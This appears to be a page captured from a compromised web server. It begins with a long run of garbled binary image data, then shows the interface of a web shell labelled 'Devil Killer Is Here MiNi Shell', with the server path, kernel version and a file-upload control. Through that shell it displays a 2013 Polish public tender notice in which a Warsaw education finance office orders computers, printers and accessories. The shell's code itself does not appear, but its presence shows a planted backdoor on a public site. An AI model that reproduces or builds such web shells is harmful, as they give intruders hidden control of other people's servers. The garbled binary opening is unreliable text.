JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130813/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130813/161241-N-2013.html

<p class="kh_header"><b>Warszawa: Dostawa artykułów komputerowych dla Miejskiego Biura Finansów Oświaty m. st. Warszawy przy ul. Mokotowskiej 55 w Warszawie.</b><br>
<b>Numer ogłoszenia: 161241 - 2013; data zamieszczenia: 13.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Biuro Finansów Oświaty m. st. Warszawy , ul. Mokotowska 55, 00-542 Warszawa, woj. mazowieckie, tel. 022 6969015, faks 022 6213045.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mbfo.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów komputerowych dla Miejskiego Biura Finansów Oświaty m. st. Warszawy przy ul. Mokotowskiej 55 w Warszawie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: 

Pendrive - 1 szt.
interfejsUSB 2.0 
pojemność	32 GB 
prędkość odczytu	35 MB na s 
prędkość zapisu	24 MB na s 
opcje dodatkowe	Ochrona hasłem,  szyfrowanie sprzętowe AES

Akumulator do UPS APC 620sc (RBC4) -2 szt.
typ	Bezobsługowe baterie ołowiowo-kwasowe 
maksymalna wysokość 	99.00 mm 
maksymalna szerokość 	94.00 mm 
maksymalna głębokość 	150.00 mm 

Komputer - 14 szt.
typ obudowy komputera	Mini Tower
ilość zainstalowanych procesorów	1 szt.
maksymalna ilość procesorów	1 szt.
technologia wykonania procesora	22 nm
liczba rdzeni procesora	4
min. częstotliwość procesora	3,1 GHz
pojemność pamięci  Cache 	6 MB 
ilość zainstalowanych dysków	1 szt.
pojemność zainstalowanego dysku	500 GB
typ zainstalowanego dysku	3,5, SATA III
pojemność zainstalowanej pamięci	8192 MB
maksymalna pojemność pamięci	16384 MB
rodzaj zainstalowanej pamięci	DDR3
typ pamięci	Non-ECC
częstotliwość szyny pamięci 	1600 MHz
ilość banków pamięci	4 szt.
ilość wolnych banków pamięci	2 szt.
zintegrowana karta graficzna 	Tak
zintegrowana karta dźwiękowa 	Tak
zintegrowana karta sieciowa 	Tak
typ zintegrowanej karty sieciowej 	10 na 100 na 1000 Mbit na s
porty wewnętrzne	1x PCI-E x16
3x PCI-E x1
4x SATA III
rodzaje wyjść  na  wejść - panel przedni	1x czytnik kart pamięci 11 w 1 (SD, SD mini, MMC, RS, MS, MS Pro, MS Duo, SM, xD, CF, MD)
1x wejście mikrofonowe
1x wyjście słuchawkowe na głośnikowe 
2x USB 2.0 
2x USB 3.0
rodzaje wejść na wyjść - panel tylni	1x HDMI
1x RJ45 (LAN)
1x VGA (D-sub)
1x wyjście słuchawkowe na głośnikowe (S/PDIF)
2x USB 3.0
2x USB 2.0
6x liniowe wyjścia AUDIO (możliwość podłączenia zestawu 7.1)
napędy wbudowane (zainstalowane)	DVD-ROM
moc zasilacza (zasilaczy) 	350 W, lub sprawności 90% umożliwiający bezproblemową pracę komputera przy pełnym wyposażeniu w dodatkowe urządzenia podpięte poprzez porty
system operacyjny 	Microsoft Windows 7 Professional PL 64-bit,  dołączone płyty ze sterownikami dla Windows 7 Professional 64-bit 

Pamięć RAM - 2 szt.
rodzaj pamięci	DDR3 DIMM (PC3-12800)
częstotliwość pracy	1600 MHz 
pojemność pamięci	4 GB 

Dysk twardy - 1 szt.
format szerokości	2.5 cala 
typ	SSD 
pojemność	120 GB 
interfejs	Serial ATA 
wersja interfejsu	Serial ATA/600 
maks. transfer zewnętrzny	600 MB/s 
szybkość odczytu	550 MB/s 
szybkość zapisu	500 MB na s 

Drukarka - urządzenie wielofunkcyjne - 1 szt.
technologia druku	laserowa monochromatyczna 
maks. rozmiar nośnika	A4 
rozdzielczość druku w czerni	2400 x 600 dpi 
maks. szybkość druku mono	26 str. na min. 
funkcje specjalne drukarki	drukowanie dwustronne
typ skanera	kolorowy skaner płaski 
rozdzielczość skanera	600 x 2400 dpi 
interfejs	USB 2.0 

Drukarka - laserowa monochromatyczna - 1 szt.
nominalna prędkość druku	40 str./min. 
rozdzielczość w pionie	1200 dpi 
rozdzielczość w poziomie	1200 dpi 
normatywny cykl pracy	100000 str./mies. 
pojemność podajnika papieru	600 szt. 
maks. rozmiar nośnika	A4 
złącza zewnętrzne	USB 2.0 
druk dwustronny [dupleks]	tak (automatyczny) 

Drukarka - laserowa monochromatyczna - 1 szt.
nominalna prędkość druku	30 str./min. 
rozdzielczość w pionie	1200 dpi 
rozdzielczość w poziomie	1200 dpi 
normatywny cykl pracy	30000 str./mies. 
pojemność podajnika papieru	600 szt. 
maks. rozmiar nośnika	A4 
złącza zewnętrzne	USB 2.0 
druk dwustronny [dupleks]	tak (automatyczny) 
Fax - 1 szt.
technologia wydruku	laserowa 
identyfikacja Abonenta Wywołującego	tak 
funkcja kopiowania	tak 
dodatkowe cechy	Opisy na obudowie w języku polskim
Komunikaty na wyświetlaczu LCD i wydruki raportów w języku polskim
Pamięć dokumentów: min 150 stron w trybie odbioru
Książka telefoniczna na 100 wpisów

Klawiatura - 10 szt.
typ klawiatury	płaska 
komunikacja z klawiaturą	przewodowa 
interfejs	USB 

Klawiatura - 1 szt.
rodzaj klawiatury:	elastyczna
układ 	typu desktop
typ złącza: 	USB
cechy dodatkowe: 	wbudowana klawiatura numeryczna; 
odporna na zalanie, brud i kurz ; 


Monitor - 1 szt.
Przekątna 	17 cali
technologia wykonania	TN
rodzaj podświetlenia	CCFL
rozdzielczość nominalna	1280 x 1024 piksele
jasność	250 cd/m2
maks. częst. odchylania pionowego	75 Hz
maks. częst. odchylania poziomego	80 kHz 
wielkość plamki	0.26 mm
czas reakcji plamki	5 ms
ilość wyświetlanych kolorów	16.7 mln
analogowe złącze D-Sub 15-pin	tak
cyfrowe złącze DVI	tak
zgodność z technologią HDCP	tak
wbudowane głośniki	tak

Microsoft Windows 7 Professional 64Bit PL OEM - 1 szt.

Profilowana podkładka pod mysz jednokolorowa - 1 szt.

Przedłużacz kabla USB 2 m - 2 szt.

Powyższe parametry są wartościami minimalnymi.
System oraz oprogramowanie muszą być zainstalowane na każdym komputerze. 
Wszystkie komponenty muszą być objęte gwarancją producenta.

2.	Zamawiający dopuszcza składanie ofert na sprzęt równoważny; przez ofertę równoważną rozumie się dostawę artykułów komputerowych o parametrach nie gorszych niż określone przez zamawiającego. Zamawiający dopuszcza możliwość zakupu programów równoważnych 
do programów wskazanych w pkt II.1 SIWZ . Za równoważny program należy uznać program 
o takich samych lub lepszych parametrach i który jest kompatybilny ze wszystkimi programami 
i platformami co program wskazany. Oferowane Zamawiającemu równoważne oprogramowania 
i systemy muszą być dostosowane do aktualnej infrastruktury informatycznej Zamawiającego 
i nie mogą powodować konieczności jej przebudowania bądź powiększenia. Jeżeli wykonawca zaoferuje materiały lub urządzenia równoważne, zobowiązany jest dostarczyć wraz z ofertą opis pozycji równoważnych z podaniem wytwórcy, parametrów technicznych i jakościowych potwierdzonych kartami technicznymi wyrobu wydanymi przez producenta. W przypadku wątpliwości, co do równoważności oferowanych wyrobów zamawiający może wezwać wykonawcę do złożenia we wskazanym terminie wyjaśnień dotyczących treści oferty. 


3.	Oferowany sprzęt wyszczególniony w pozostałych częściach zamówienia musi być fabrycznie nowy, objęty co najmniej 36 miesięczną gwarancją z zapewnieniem producenta 
o międzynarodowych uprawnieniach gwarancyjnych poza granicami Polski. Dostarczone urządzenia muszą posiadać karty gwarancyjne wydane przez producenta urządzenia.

4.	Wszelkie koszty związane z wykonywaniem obowiązków gwarancyjnych ponosi Wykonawca.

5.	Strony ustalają, że naprawy będą dokonywane w zależności od potrzeb, w miejscu wskazanym przez Wykonawcę. Ewentualne dostarczenie sprzętu do punktu napraw obciąża Wykonawcę.

6.	Zamawiający wymaga, by czas naprawy sprzętu nie przekraczał 2 dni roboczych. Przekraczając ten termin Wykonawca jest obowiązany dostarczyć sprzęt zastępczy (odpowiadający parametrom technicznym wymienianego sprzętu). Naprawa sprzętu trwająca dłużej 
niż 31 dni kalendarzowych będzie się wiązała z obowiązkiem wymiany sprzętu przez Wykonawcę na nowy.

7.	Przedmiot zamówienia zostanie dostarczony do Miejskiego Biura Finansów Oświaty 
m. st. Warszawy ul. Mokotowska 55, 00-542 Warszawa, do pomieszczenia wskazanego 
przez osobę nadzorującą umowę ze strony Zamawiającego. 

8.	Oferowany sprzęt musi być fabrycznie nowy, najwyższej jakości oraz musi posiadać europejski certyfikat zgodności CE, i spełniać wszelkie normy obowiązującego prawa dopuszczającego dany produkt do obrotu, a w przypadku komputerów certyfikat zgodności z normą 
Energy Star 5.0.

9.	Wykonawca zapewnia sprzęt zastępczy o parametrach nie gorszych niż uszkodzony sprzęt na okres naprawy dłuższy niż 2 (dwa) dni.

10.	Wykonawca będzie odpowiedzialny względem Zamawiającego za to, że jest uprawniony 
do wprowadzenia do obrotu oprogramowania wchodzącego w skład zamówienia  oraz za to, 
że Zamawiający wskutek zawarcia umowy będzie upoważniony do korzystania w ramach zwykłego użytku ze wszelkiego oprogramowania dostarczonego wraz ze sprzętem.

11. Wykonawca przekaże wraz ze sprzętem szczegółowe instrukcje obsługi (w języku polskim) 
dla każdej właściwej jednostki dostarczonego sprzętu.

12. Wspólny Słownik Zamówień CPV:
	
30213100-6 	30237000-9 

13. Zamawiający nie dopuszcza możliwości składania ofert częściowych.
14. Zamawiający nie dopuszcza możliwości złożenia oferty przewidującej odmienny niż określony
 w niniejszej SIWZ sposób wykonania zamówienia (oferty wariantowej).
15. Zamawiający informuje, iż nie dopuszcza możliwości zamówień uzupełniających, o których mowa 
 w art. 67 ust. 1, pkt 7 pzp. 
16. Zamawiający dopuszcza możliwość zmiany umowy na podstawie art. 144 pzp poprzez wydłużenie terminu realizacji umowy w sytuacji, w której wykonawca z obiektywnych przyczyn 
nie jest w stanie wykonać zamówienia w terminie pierwotnie wskazanym w umowie, 
zaś nie można było tego przewidzieć w chwili podpisywania umowy.
17. Cena jednostkowa brutto jakiegokolwiek urządzenia nie może przekraczać kwoty 3 500 zł..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.21.31.00-6, 30.23.70.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania ww. warunków zostanie przeprowadzona zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty zgodnie ze szczegółowym opisem rodzajów dokumentów i oświadczeń zawartym w V rozdziale do SIWZ. 
Z treści załączonych dokumentów musi jednoznacznie wynikać, iż ww. warunki Wykonawca spełnił. 
Niespełnienie chociażby jednego z ww. warunków skutkować będzie wykluczeniem Wykonawcy 
z postępowania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.4	Wypełniony i podpisany wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, 
z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane oraz załączeniem dowodów, że te dostawy zostały wykonane należycie (załącznik nr 3) - należy podać co najmniej 3 dostawy artykułów komputerowych o wartości nie niższej niż 40 000 zł brutto każda.
Ocena spełniania ww. warunków zostanie przeprowadzona zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty zgodnie ze szczegółowym opisem rodzajów dokumentów i oświadczeń zawartym w V rozdziale do SIWZ. 
Z treści załączonych dokumentów musi jednoznacznie wynikać, iż ww. warunki Wykonawca spełnił. 
Niespełnienie chociażby jednego z ww. warunków skutkować będzie wykluczeniem Wykonawcy 
z postępowania
Ocena spełniania ww. warunków zostanie przeprowadzona zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty zgodnie ze szczegółowym opisem rodzajów dokumentów i oświadczeń zawartym w V rozdziale do SIWZ. 
Z treści załączonych dokumentów musi jednoznacznie wynikać, iż ww. warunki Wykonawca spełnił. 
Niespełnienie chociażby jednego z ww. warunków skutkować będzie wykluczeniem Wykonawcy 
z postępowania</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.11	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji winien przedstawić zobowiązanie tych podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia wg wzoru stanowiącego załącznik nr 5 do SIWZ oraz dokumenty wymienione w pkt 1.1-1.3, 1.5-1.9., a także dokumenty dotyczące w szczególności: zakresu dostępnych wykonawcy zasobów innego podmiotu, sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
Ocena spełniania ww. warunków zostanie przeprowadzona zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty zgodnie ze szczegółowym opisem rodzajów dokumentów i oświadczeń zawartym w V rozdziale do SIWZ. 
Z treści załączonych dokumentów musi jednoznacznie wynikać, iż ww. warunki Wykonawca spełnił. 
Niespełnienie chociażby jednego z ww. warunków skutkować będzie wykluczeniem Wykonawcy 
z postępowania</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.5	Polisa wraz z dowodem jej opłacenia, a w przypadku jej braku inny dokument potwierdzający, 
że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie niższą niż 45 000 zł ważna na cały okres realizacji niniejszego zamówienia, a w przypadku, gdy ważność polisy jest krótsza, niż okres realizacji niniejszego zamówienia, oświadczenie Wykonawcy zapewniające o kontynuowaniu ubezpieczenia zgodnie z okresem realizacji niniejszego zamówienia.

Ocena spełniania ww. warunków zostanie przeprowadzona zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty zgodnie ze szczegółowym opisem rodzajów dokumentów i oświadczeń zawartym w V rozdziale do SIWZ. 
Z treści załączonych dokumentów musi jednoznacznie wynikać, iż ww. warunki Wykonawca spełnił. 
Niespełnienie chociażby jednego z ww. warunków skutkować będzie wykluczeniem Wykonawcy 
z postępowania</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany umowy na podstawie art. 144 pzp poprzez wydłużenie terminu realizacji umowy w sytuacji, w której wykonawca z obiektywnych przyczyn 
nie jest w stanie wykonać zamówienia w terminie pierwotnie wskazanym w umowie, 
zaś nie można było tego przewidzieć w chwili podpisywania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mbfo.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskie Biuro Finansów Oświaty m. st. Warszawy
ul. Mokotowska 55
00-542 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.08.2013 godzina 09:00, miejsce: Miejskie Biuro Finansów Oświaty m. st. Warszawy
ul. Mokotowska 55
00-542 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





